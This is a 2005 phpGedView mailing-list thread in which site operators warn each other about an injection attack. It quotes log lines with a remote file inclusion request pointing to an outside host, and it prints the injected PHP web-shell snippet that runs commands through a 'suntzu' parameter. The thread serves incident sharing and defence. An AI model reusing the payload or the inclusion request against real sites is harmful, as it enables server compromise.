Re: [Phpgedview-talk] attack attempt
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
Re: [Phpgedview-talk] attack attempt
|
From: Johan B. <mai...@go...> - 2005-12-25 10:25:26
|
Hi Folks, An another attempt here at http://barelds.good-it.com. See below a piece from my webserver logs: --------------------- 81.91.66.220 - - [25/Dec/2005:05:38:06 +0100] "GET /phpgedview/help_text_vars.php?suntzu=df&PGV_BASE_DIRECTORY=http://mondomix-planet.com/radio/encrypt.txt HTTP/1.1" 200 64 "-" "Ziggy -- The Clown From Hell!!" 87.64.24.78 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Sgrunt| V109|1012|S214027450|dialno; snprtz|dialno)" --------------------- The URL mentioned in the log is still there and available. Perhaps someone should notify the ISP? Grz. Johan Op dinsdag 20 december 2005 20:31, schreef Matthew Gates: > Hi all, > > I had a curious user request on my phpGedView site. Looks like they're > attempting some PHP injection style attack, using PHP code in the email > address and other field in the user table, like this: > > \';error_reporting(0);if(isset($suntzu)) > {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' > > From my log files it looks like the attacker was trying to download a linux > binary and a PHP script using wget. I grabbed the target files and can > provide a sample if anyone is interested in trying to un-pick what they do > (know a good linux dis-assembler?). > > Doesn't look like they managed to do anything nasty, probably because wget > isn't available on my server. Just a heads up for everyone to keep an eye > out. Grep your logs for wget. > > I reported the incident to SANS and they said they have seen it and sent me > this link, which looks like a published version of the exploit: > > http://www.milw0rm.com/id.php?id=1379 > > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 > final, so I think I would have been infected if I had had wget installed. > Watch yourselves! > > I'm guessing we need a patch of some sort. > > Regards, -- Kind Regards / Met vriendelijke groet, Johan Barelds Good-IT! Tel.+31(0)70-3296957 Martinus Nijhoffweg 42 Mob.+31(0)6-54253750 2548 EP Den Haag j.b...@go... http://www.good-it.com |
